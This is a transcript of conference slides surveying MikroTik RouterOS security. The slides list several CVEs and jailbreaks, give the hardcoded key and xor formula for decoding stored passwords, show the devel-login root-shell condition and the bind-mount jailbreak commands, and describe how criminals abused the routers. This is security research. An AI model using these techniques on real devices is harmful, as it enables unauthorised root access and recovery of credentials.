the state of mikrotik security. an overview. · author lead researcher at possible security, latvia...
TRANSCRIPT
![Page 1: The state of MikroTik security. An overview. · Author Lead researcher at Possible Security, Latvia Hacking and breaking things – Network flow analysis – Reverse engineering –](https://reader031.vdocuments.net/reader031/viewer/2022022713/5c4407dd93f3c34c5501d428/html5/thumbnails/1.jpg)
The state ofMikroTik security.An overview.
SigSegV1, Paris, France
![Page 2: The state of MikroTik security. An overview. · Author Lead researcher at Possible Security, Latvia Hacking and breaking things – Network flow analysis – Reverse engineering –](https://reader031.vdocuments.net/reader031/viewer/2022022713/5c4407dd93f3c34c5501d428/html5/thumbnails/2.jpg)
Author● Lead researcher at Possible
Security, Latvia● Hacking and breaking things
– Network flow analysis– Reverse engineering– Social engineering– Legal dimension
● http://kirils.org/● twitter / @KirilsSolovjovs
![Page 3: The state of MikroTik security. An overview. · Author Lead researcher at Possible Security, Latvia Hacking and breaking things – Network flow analysis – Reverse engineering –](https://reader031.vdocuments.net/reader031/viewer/2022022713/5c4407dd93f3c34c5501d428/html5/thumbnails/3.jpg)
Mikrotik RouterOS
● Linux– old
● Startup scripts● Nova binaries● Config
![Page 4: The state of MikroTik security. An overview. · Author Lead researcher at Possible Security, Latvia Hacking and breaking things – Network flow analysis – Reverse engineering –](https://reader031.vdocuments.net/reader031/viewer/2022022713/5c4407dd93f3c34c5501d428/html5/thumbnails/4.jpg)
Closed source and closed ecosystem
![Page 5: The state of MikroTik security. An overview. · Author Lead researcher at Possible Security, Latvia Hacking and breaking things – Network flow analysis – Reverse engineering –](https://reader031.vdocuments.net/reader031/viewer/2022022713/5c4407dd93f3c34c5501d428/html5/thumbnails/5.jpg)
Is it popular?
France = 3505 devices = 0.16%
![Page 6: The state of MikroTik security. An overview. · Author Lead researcher at Possible Security, Latvia Hacking and breaking things – Network flow analysis – Reverse engineering –](https://reader031.vdocuments.net/reader031/viewer/2022022713/5c4407dd93f3c34c5501d428/html5/thumbnails/6.jpg)
RouterOS 6.43.4
![Page 7: The state of MikroTik security. An overview. · Author Lead researcher at Possible Security, Latvia Hacking and breaking things – Network flow analysis – Reverse engineering –](https://reader031.vdocuments.net/reader031/viewer/2022022713/5c4407dd93f3c34c5501d428/html5/thumbnails/7.jpg)
Ecosystem. Possible entry points.
![Page 8: The state of MikroTik security. An overview. · Author Lead researcher at Possible Security, Latvia Hacking and breaking things – Network flow analysis – Reverse engineering –](https://reader031.vdocuments.net/reader031/viewer/2022022713/5c4407dd93f3c34c5501d428/html5/thumbnails/8.jpg)
Vulnerabilities
● 283i4jfkai3389● chimay_red● devel-login based jailbreaks● CVE-2018-7445 samba● CVE-2018-14847 winbox● CVE-2018-115{6,7,8,9}
![Page 9: The state of MikroTik security. An overview. · Author Lead researcher at Possible Security, Latvia Hacking and breaking things – Network flow analysis – Reverse engineering –](https://reader031.vdocuments.net/reader031/viewer/2022022713/5c4407dd93f3c34c5501d428/html5/thumbnails/9.jpg)
283i4jfkai3389
‘MEMBER ME?
key = md5(username + "283i4jfkai3389")password = user["password"] xor key
![Page 10: The state of MikroTik security. An overview. · Author Lead researcher at Possible Security, Latvia Hacking and breaking things – Network flow analysis – Reverse engineering –](https://reader031.vdocuments.net/reader031/viewer/2022022713/5c4407dd93f3c34c5501d428/html5/thumbnails/10.jpg)
chimay_red
● Unauthenticated RCE● Stack clashing by setting large Content-Length
– stacksize on 6.31 and below is 0x800000– stacksize on 6.32 and above is 0x020000
● /nova/bin/www Request::readPostData()● Fixed in 6.38.5 & 6.37.5
![Page 11: The state of MikroTik security. An overview. · Author Lead researcher at Possible Security, Latvia Hacking and breaking things – Network flow analysis – Reverse engineering –](https://reader031.vdocuments.net/reader031/viewer/2022022713/5c4407dd93f3c34c5501d428/html5/thumbnails/11.jpg)
chimay_red
/nova/bin/www
![Page 12: The state of MikroTik security. An overview. · Author Lead researcher at Possible Security, Latvia Hacking and breaking things – Network flow analysis – Reverse engineering –](https://reader031.vdocuments.net/reader031/viewer/2022022713/5c4407dd93f3c34c5501d428/html5/thumbnails/12.jpg)
chimay_red
![Page 13: The state of MikroTik security. An overview. · Author Lead researcher at Possible Security, Latvia Hacking and breaking things – Network flow analysis – Reverse engineering –](https://reader031.vdocuments.net/reader031/viewer/2022022713/5c4407dd93f3c34c5501d428/html5/thumbnails/13.jpg)
devel-login based jailbreaks● Authenticated root-level access
[ -f /nova/etc/devel-login
&& username == devel
&& password == admin.password ]
&& /bin/ash
● /nova/bin/login● Fixed in 6.41 (not backported)
![Page 14: The state of MikroTik security. An overview. · Author Lead researcher at Possible Security, Latvia Hacking and breaking things – Network flow analysis – Reverse engineering –](https://reader031.vdocuments.net/reader031/viewer/2022022713/5c4407dd93f3c34c5501d428/html5/thumbnails/14.jpg)
devel-login
![Page 15: The state of MikroTik security. An overview. · Author Lead researcher at Possible Security, Latvia Hacking and breaking things – Network flow analysis – Reverse engineering –](https://reader031.vdocuments.net/reader031/viewer/2022022713/5c4407dd93f3c34c5501d428/html5/thumbnails/15.jpg)
devel-login
![Page 16: The state of MikroTik security. An overview. · Author Lead researcher at Possible Security, Latvia Hacking and breaking things – Network flow analysis – Reverse engineering –](https://reader031.vdocuments.net/reader031/viewer/2022022713/5c4407dd93f3c34c5501d428/html5/thumbnails/16.jpg)
CVE-2018-7445 samba
● Unauthenticated RCE● Via heap buffer overflow with long NetBIOS names in
NetBIOS session request messages● /nova/bin/smb SmbRmDir()● Fixed in 6.41.3 & 6.40.7
![Page 17: The state of MikroTik security. An overview. · Author Lead researcher at Possible Security, Latvia Hacking and breaking things – Network flow analysis – Reverse engineering –](https://reader031.vdocuments.net/reader031/viewer/2022022713/5c4407dd93f3c34c5501d428/html5/thumbnails/17.jpg)
CVE-2018-7445 samba
/nova/bin/smb
![Page 18: The state of MikroTik security. An overview. · Author Lead researcher at Possible Security, Latvia Hacking and breaking things – Network flow analysis – Reverse engineering –](https://reader031.vdocuments.net/reader031/viewer/2022022713/5c4407dd93f3c34c5501d428/html5/thumbnails/18.jpg)
CVE-2018-7445 samba
/nova/bin/smb
![Page 19: The state of MikroTik security. An overview. · Author Lead researcher at Possible Security, Latvia Hacking and breaking things – Network flow analysis – Reverse engineering –](https://reader031.vdocuments.net/reader031/viewer/2022022713/5c4407dd93f3c34c5501d428/html5/thumbnails/19.jpg)
CVE-2018-14847 winbox
● Unauthenticated predefined function exection (file read)● Via abusing DLL download functionality● /nova/bin/mproxy● Fixed in 6.42.1 & 6.40.8
![Page 20: The state of MikroTik security. An overview. · Author Lead researcher at Possible Security, Latvia Hacking and breaking things – Network flow analysis – Reverse engineering –](https://reader031.vdocuments.net/reader031/viewer/2022022713/5c4407dd93f3c34c5501d428/html5/thumbnails/20.jpg)
CVE-2018-14847 winbox
![Page 21: The state of MikroTik security. An overview. · Author Lead researcher at Possible Security, Latvia Hacking and breaking things – Network flow analysis – Reverse engineering –](https://reader031.vdocuments.net/reader031/viewer/2022022713/5c4407dd93f3c34c5501d428/html5/thumbnails/21.jpg)
CVE-2018-14847 winbox
![Page 22: The state of MikroTik security. An overview. · Author Lead researcher at Possible Security, Latvia Hacking and breaking things – Network flow analysis – Reverse engineering –](https://reader031.vdocuments.net/reader031/viewer/2022022713/5c4407dd93f3c34c5501d428/html5/thumbnails/22.jpg)
CVE-2018-1156 licupgr
● Authenticated RCE● Via stack buffer overflow in sprintf()● /nova/bin/licupgr busy_cde()● Fixed in 6.42.7 & 6.40.9
![Page 23: The state of MikroTik security. An overview. · Author Lead researcher at Possible Security, Latvia Hacking and breaking things – Network flow analysis – Reverse engineering –](https://reader031.vdocuments.net/reader031/viewer/2022022713/5c4407dd93f3c34c5501d428/html5/thumbnails/23.jpg)
CVE-2018-1156 licupgr
![Page 24: The state of MikroTik security. An overview. · Author Lead researcher at Possible Security, Latvia Hacking and breaking things – Network flow analysis – Reverse engineering –](https://reader031.vdocuments.net/reader031/viewer/2022022713/5c4407dd93f3c34c5501d428/html5/thumbnails/24.jpg)
package/option based jailbreak
![Page 25: The state of MikroTik security. An overview. · Author Lead researcher at Possible Security, Latvia Hacking and breaking things – Network flow analysis – Reverse engineering –](https://reader031.vdocuments.net/reader031/viewer/2022022713/5c4407dd93f3c34c5501d428/html5/thumbnails/25.jpg)
package/option based jailbreak
● lib/libumsg.so● nv::hasPackage(“option”)● nv::hasPackage checks if
– /pckg/<name> exists– if it’s not a symlink– if fs is squashfs
● mkdir /pckg/option● mount -o bind
/pckg/dude/ /pckg/option
¯\_(ツ )_/¯
![Page 26: The state of MikroTik security. An overview. · Author Lead researcher at Possible Security, Latvia Hacking and breaking things – Network flow analysis – Reverse engineering –](https://reader031.vdocuments.net/reader031/viewer/2022022713/5c4407dd93f3c34c5501d428/html5/thumbnails/26.jpg)
![Page 27: The state of MikroTik security. An overview. · Author Lead researcher at Possible Security, Latvia Hacking and breaking things – Network flow analysis – Reverse engineering –](https://reader031.vdocuments.net/reader031/viewer/2022022713/5c4407dd93f3c34c5501d428/html5/thumbnails/27.jpg)
![Page 28: The state of MikroTik security. An overview. · Author Lead researcher at Possible Security, Latvia Hacking and breaking things – Network flow analysis – Reverse engineering –](https://reader031.vdocuments.net/reader031/viewer/2022022713/5c4407dd93f3c34c5501d428/html5/thumbnails/28.jpg)
jailbreak
● Use exploit-backup for versions up to 6.41● Use the new method for versions starting with 6.41● Should support all current versions up to at least 6.43.4
![Page 29: The state of MikroTik security. An overview. · Author Lead researcher at Possible Security, Latvia Hacking and breaking things – Network flow analysis – Reverse engineering –](https://reader031.vdocuments.net/reader031/viewer/2022022713/5c4407dd93f3c34c5501d428/html5/thumbnails/29.jpg)
jailbreak
![Page 30: The state of MikroTik security. An overview. · Author Lead researcher at Possible Security, Latvia Hacking and breaking things – Network flow analysis – Reverse engineering –](https://reader031.vdocuments.net/reader031/viewer/2022022713/5c4407dd93f3c34c5501d428/html5/thumbnails/30.jpg)
Status quo
![Page 31: The state of MikroTik security. An overview. · Author Lead researcher at Possible Security, Latvia Hacking and breaking things – Network flow analysis – Reverse engineering –](https://reader031.vdocuments.net/reader031/viewer/2022022713/5c4407dd93f3c34c5501d428/html5/thumbnails/31.jpg)
What versions are in use?
![Page 32: The state of MikroTik security. An overview. · Author Lead researcher at Possible Security, Latvia Hacking and breaking things – Network flow analysis – Reverse engineering –](https://reader031.vdocuments.net/reader031/viewer/2022022713/5c4407dd93f3c34c5501d428/html5/thumbnails/32.jpg)
What versions are in use?
![Page 33: The state of MikroTik security. An overview. · Author Lead researcher at Possible Security, Latvia Hacking and breaking things – Network flow analysis – Reverse engineering –](https://reader031.vdocuments.net/reader031/viewer/2022022713/5c4407dd93f3c34c5501d428/html5/thumbnails/33.jpg)
Vulnerable devices
![Page 34: The state of MikroTik security. An overview. · Author Lead researcher at Possible Security, Latvia Hacking and breaking things – Network flow analysis – Reverse engineering –](https://reader031.vdocuments.net/reader031/viewer/2022022713/5c4407dd93f3c34c5501d428/html5/thumbnails/34.jpg)
Abuse by criminals
● RouterOS powerful enough on its own● Still installing custom binaries
– 3.3.5mips.ko– bash– wget– socat– iptables (lol)
![Page 35: The state of MikroTik security. An overview. · Author Lead researcher at Possible Security, Latvia Hacking and breaking things – Network flow analysis – Reverse engineering –](https://reader031.vdocuments.net/reader031/viewer/2022022713/5c4407dd93f3c34c5501d428/html5/thumbnails/35.jpg)
Abuse by criminals
● «Thousands of MikroTik Routers Hacked to Eavesdrop On Network Traffic»
● TZSP to sniff● Socks4 Coinhive miner→● Scheduler to update config and restore control
![Page 36: The state of MikroTik security. An overview. · Author Lead researcher at Possible Security, Latvia Hacking and breaking things – Network flow analysis – Reverse engineering –](https://reader031.vdocuments.net/reader031/viewer/2022022713/5c4407dd93f3c34c5501d428/html5/thumbnails/36.jpg)
Abuse by criminals
![Page 37: The state of MikroTik security. An overview. · Author Lead researcher at Possible Security, Latvia Hacking and breaking things – Network flow analysis – Reverse engineering –](https://reader031.vdocuments.net/reader031/viewer/2022022713/5c4407dd93f3c34c5501d428/html5/thumbnails/37.jpg)
Hardening (6.43)
● Password «fixed». Uses SHA256 & ECC now.
![Page 38: The state of MikroTik security. An overview. · Author Lead researcher at Possible Security, Latvia Hacking and breaking things – Network flow analysis – Reverse engineering –](https://reader031.vdocuments.net/reader031/viewer/2022022713/5c4407dd93f3c34c5501d428/html5/thumbnails/38.jpg)
Jailbreaks available and other tools available at https://github.com/0ki/mikrotik-tools
http://kirils.org/
twitter / @KirilsSolovjovs follow me!←
SigSegV1, Paris, France
WARNING! English ;)
The state of MikroTik security. An overview.